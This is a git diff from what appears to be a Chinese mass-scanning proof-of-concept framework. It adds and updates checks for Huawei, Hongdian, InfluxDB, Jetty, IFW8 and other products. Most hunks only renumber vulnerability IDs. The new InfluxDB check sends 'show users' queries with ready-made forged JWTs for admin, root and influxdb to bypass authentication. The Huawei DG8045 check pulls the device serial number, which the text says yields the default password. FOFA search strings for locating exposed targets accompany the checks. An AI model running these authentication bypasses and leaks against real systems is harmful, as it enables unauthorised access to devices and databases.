b/poc/HST_好视通/File_Download/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "好视通视频会议平台 任意文件下载", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "好视通视频会议平台", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..0667b57 Binary files /dev/null and b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py index c70cd25..d0a25fe 100644 --- a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py +++ b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py @@ -10,11 +10,12 @@ class POC(POCBase): _info = { "author" : "jijue", # POC作者 - "version" : "1", # POC版本,默认是1 + "version" : "2", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 笔者没有zoomeye高级账号,所以就没测试了,换而言之,该POC不一定靠谱 + v1 : 笔者没有zoomeye高级账号,所以就没测试了,换而言之,该POC不一定靠谱 + v2 : 笔者特地去zoomeye找资产测试,然后做了点优化,这回应该靠谱了 """, # POC描述,写更新描述,没有就不写 "name" : "宏电 H8922 后台任意文件读取漏洞", # 漏洞名称 @@ -56,7 +57,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "root:" in req.text and req.status_code == 200: + if "root:" in req.text and req.status_code == 200 and "application/octet-stream" in req.headers["Content-Type"]: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc b/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a1041ba Binary files /dev/null and b/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Huawei/File_Read_HG659_lib/poc.py b/poc/Huawei/File_Read_HG659_lib/poc.py index 30a0d26..28938e5 100644 --- a/poc/Huawei/File_Read_HG659_lib/poc.py +++ b/poc/Huawei/File_Read_HG659_lib/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Huawei HG659 lib 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Huawei HG659", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc b/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c8cf81c Binary files /dev/null and b/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Huawei/Info_Disclosure_DG8045/poc.py b/poc/Huawei/Info_Disclosure_DG8045/poc.py new file mode 100644 index 0000000..91900a6 --- /dev/null +++ b/poc/Huawei/Info_Disclosure_DG8045/poc.py @@ -0,0 +1,74 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "华为路由器敏感信息泄露 DG8045 Router 1.0", # 漏洞名称 + "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "华为DG8045路由器", # 漏洞应用名称 + "AppVersion" : "1.0版本", # 漏洞应用版本 + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + 路由器默认密码是序列号的最后8位 + """, # 漏洞简要描述 + + "fofa-dork":""" + app="DG8045-Home-Gateway-DG8045" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/api/system/deviceinfo" # url自己按需调整 + + + headers = { + "User-Agent":get_random_ua(), + "Connection":"close", + "X-Requested-With": "XMLHttpRequest", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "SerialNumber" in req.text and "DeviceName" in req.text: + vuln = [True,req.text] + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3039b9b Binary files /dev/null and b/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5e0e0f5 Binary files /dev/null and b/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HuiWen_汇文/Weak_Pass/poc.py b/poc/HuiWen_汇文/Weak_Pass/poc.py index 81d6cfb..3a260b3 100644 --- a/poc/HuiWen_汇文/Weak_Pass/poc.py +++ b/poc/HuiWen_汇文/Weak_Pass/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "汇文OPAC弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "汇文OPAC", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..cd341f6 Binary files /dev/null and b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py index 2b3b049..ca42430 100644 --- a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py +++ b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py @@ -4,17 +4,19 @@ from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase # ... import urllib3 +import re urllib3.disable_warnings() class POC(POCBase): _info = { "author" : "jijue", # POC作者 - "version" : "1", # POC版本,默认是1 + "version" : "2", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 略 + v1 : 略 + v2 : v1是字符串匹配,最然当时已经写得很严谨了,但仍有万分之一的几率会误报,改成了正则匹配可以解决 """, # POC描述,写更新描述,没有就不写 "name" : "蜂网互联 企业级路由器v4.31 密码泄露漏洞", # 漏洞名称 @@ -54,8 +56,9 @@ class POC(POCBase): """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "note" in req.text and "status" in req.text and "pwd" in req.text and "aju" in req.text and req.status_code == 200: + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False , allow_redirects=False) + result = re.match("\{\"state\":1,\"rows\":\[\{\".+\}\]\}",req.text.strip()) + if result != None and req.status_code == 200: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc b/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8aa716f Binary files /dev/null and b/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/InfluxDB/FingerPrint/poc.py b/poc/InfluxDB/FingerPrint/poc.py new file mode 100644 index 0000000..865463d --- /dev/null +++ b/poc/InfluxDB/FingerPrint/poc.py @@ -0,0 +1,75 @@ +# coding:utf-8 +import requests +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "InfluxDB指纹识别", # 漏洞名称 + "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "InfluxDB", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + InfluxDB默认把Web界面运行在8083端口、把API接口运行在8086端口 + 响应包是会有两个头,分别是X-Influxdb-Version和X-Influxdb-Build + + 该指纹识别成功后会直接返回header给控制台,方便肉眼识别 + """, # 漏洞简要描述 + + "fofa-dork":""" + app="influxdata-InfluxDB" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "" # url自己按需调整 + + + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + # "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if "X-Influxdb-Version" in req.headers or "X-Influxdb-Build" in req.headers: + vuln = [True,req.headers] + else: + vuln = [False,req.headers] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc b/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..27cd36d Binary files /dev/null and b/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/InfluxDB/UnAuth_Access/poc.py b/poc/InfluxDB/UnAuth_Access/poc.py new file mode 100644 index 0000000..3f1a6e7 --- /dev/null +++ b/poc/InfluxDB/UnAuth_Access/poc.py @@ -0,0 +1,96 @@ +# coding:utf-8 +from matplotlib import rc_params_from_file +import requests +import re +from lib.core.common import url_handle,get_random_ua +from lib.core.poc import POCBase +# ... +import urllib3 +urllib3.disable_warnings() + +class POC(POCBase): + + _info = { + "author" : "jijue", # POC作者 + "version" : "1", # POC版本,默认是1 + "CreateDate" : "2022-01-01", # POC创建时间 + "UpdateDate" : "2022-01-01", # POC创建时间 + "PocDesc" : """ + 略 + """, # POC描述,写更新描述,没有就不写 + + "name" : "InfluxDB 未授权访问", # 漏洞名称 + "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "AppName" : "InfluxDB", # 漏洞应用名称 + "AppVersion" : "", # 漏洞应用版本 + "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx + "VulnDesc" : """ + influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。 + 在用户开启了认证,但未设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 + + 笔者注意到JWT凭据中的用户名错误时会返回user not found, + 这仅代表用户名错误,但漏洞实际上是存在的,只是需要枚举出正确的用户名而已, + 出于批量扫描时的效率考虑笔者并不打算弄一个庞大的字典文件来做枚举的工作,仅证明漏洞存在即可 + """, # 漏洞简要描述 + + "fofa-dork":""" + app="influxdata-InfluxDB" + """, # fofa搜索语句 + "example" : "", # 存在漏洞的演示url,写一个就可以了 + "exp_img" : "", # 先不管 + } + + def _verify(self): + """ + 返回vuln + + 存在漏洞:vuln = [True,html_source] # html_source就是页面源码 + + 不存在漏洞:vuln = [False,""] + """ + vuln = [False,""] + url = self.target + "/query" # url自己按需调整 + data = "db=sample&q=show+users" + + users = [ + "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjozMzkyODM4NDI3fQ.nLFbzdjmyXA8JaaNPTQJx2V7QaY7QKdNEk8J37KzjKg", # admin + "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InJvb3QiLCJleHAiOjMzOTI4Mzg0Mjd9.CQoA4qksl5JlbZvuxDZ5NbxTYBVKgw38zaFFuknB2Bk", # root + "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImluZmx1eGRiIiwiZXhwIjozMzkyODM4NDI3fQ.if5__J9oZcNotrNnLTC_DoVS4sryD8oaq0n3mx55q_Q" # influxdb + ] + + # 用户名正确时 + regular0 = """\{"results":\[\{("statement_id":\d,)?"series":\[\{"columns":\[.+""" + # 用户名错误时 + regular1 = """\{"error":"user not found"\}""" + headers = {"User-Agent":get_random_ua(), + "Connection":"close", + "Authorization":"", + "Content-Type": "application/x-www-form-urlencoded", + } + + try: + """ + 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 + """ + for i in users: + headers["Authorization"] = "Bearer " + i + req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + if req.status_code == 200 and re.match(regular0,req.text.strip()): + vuln = [True,req.text] + break + elif req.status_code == 401 and re.match(regular1,req.text.strip()): + vuln = [True,req.text] + break + else: + vuln = [False,req.text] + except Exception as e: + raise e + + # 以下逻辑酌情使用 + if self._honeypot_check(vuln[1]) == True: + vuln[0] = False + + return vuln + + def _attack(self): + return self._verify() \ No newline at end of file diff --git a/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc b/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d97b9a1 Binary files /dev/null and b/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a854b29 Binary files /dev/null and b/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7ed8a24 Binary files /dev/null and b/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc b/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..9611e78 Binary files /dev/null and b/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc b/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a057572 Binary files /dev/null and b/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jetty/FingerPrint/poc.py b/poc/Jetty/FingerPrint/poc.py index d890545..541d1b0 100644 --- a/poc/Jetty/FingerPrint/poc.py +++ b/poc/Jetty/FingerPrint/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Jetty指纹识别", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Jetty", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc b/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d10b92d Binary files /dev/null and b/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py b/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py index 2d99681..1e96166 100644 --- a/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py +++ b/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc b/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7ae8d15 Binary files /dev/null and b/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc b/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1d81447 Binary files /dev/null and b/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jinher_金和OA/File_Read_download_jsp/poc.py b/poc/Jinher_金和OA/File_Read_download_jsp/poc.py index cb16056..24d55be 100644 --- a/poc/Jinher_金和OA/File_Read_download_jsp/poc.py +++ b/poc/Jinher_金和OA/File_Read_download_jsp/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "金和OA C6 download.jsp 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc b/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..064c67f Binary files /dev/null and b/poc/KEDACOM_数字系统接入网关/File_Read/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/KEDACOM_数字系统接入网关/File_Read/poc.py b/poc/KEDACOM_数字系统接入网关/File_Read/poc.py index 0bd9ee7..a524753 100644 --- a/poc/KEDACOM_数字系统接入网关/File_Read/poc.py +++ b/poc/KEDACOM_数字系统接入网关/File_Read/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "KEDACOM 数字系统接入网关 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "KEDACOM 数字系统接入网关", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc b/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1bb5fc0 Binary files /dev/null and b/poc/Kingdee_金蝶/Dir_List_server_file/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Kingdee_金蝶/Dir_List_server_file/poc.py b/poc/Kingdee_金蝶/Dir_List_server_file/poc.py index 4adef13..1660553 100644 --- a/poc/Kingdee_金蝶/Dir_List_server_file/poc.py +++ b/poc/Kingdee_金蝶/Dir_List_server_file/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "金蝶OA server_file 目录遍历漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "金蝶OA", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc b/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4269dea Binary files /dev/null and b/poc/Kingdee_金蝶/File_Down_fileDownload_do/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7d0a712 Binary files /dev/null and b/poc/Kyan/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc b/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d9110a2 Binary files /dev/null and b/poc/Landray_蓝凌OA/File_Read_CNVD_2021_28277/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc b/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..b2545dc Binary files /dev/null and b/poc/Laravel_Framework/Conf_Info_Disclosure_dot_env/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..9b6622f Binary files /dev/null and b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py index a5b1b0b..abee199 100644 --- a/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py +++ b/poc/LiPu_利谱第二代防火墙/Info_Disclosure/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "利谱第二代防火墙存在信息泄露漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "利谱第二代防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..344e84c Binary files /dev/null and b/poc/LinkSeek_朗驰欣创/FTP_Account_Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc b/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..42bd6d6 Binary files /dev/null and b/poc/MaiPu_迈普/File_Download_webui/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MaiPu_迈普/File_Download_webui/poc.py b/poc/MaiPu_迈普/File_Download_webui/poc.py index f7967d6..ce17d7e 100644 --- a/poc/MaiPu_迈普/File_Download_webui/poc.py +++ b/poc/MaiPu_迈普/File_Download_webui/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "迈普 ISG1000安全网关 任意文件下载漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "迈普 ISG1000安全网关", # 漏洞应用名称 "AppVersion" : "None", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc b/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..4d5578c Binary files /dev/null and b/poc/MailGard_佑友/RCE_ping_FireWall/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MailGard_佑友/RCE_ping_FireWall/poc.py b/poc/MailGard_佑友/RCE_ping_FireWall/poc.py index e8c57af..2f6cff2 100644 --- a/poc/MailGard_佑友/RCE_ping_FireWall/poc.py +++ b/poc/MailGard_佑友/RCE_ping_FireWall/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "佑友防火墙 后台命令执行漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "佑友防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc b/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..0508947 Binary files /dev/null and b/poc/MailGard_佑友/Weak_Pass_FireWall/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py b/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py index 20383ba..ad7cfbb 100644 --- a/poc/MailGard_佑友/Weak_Pass_FireWall/poc.py +++ 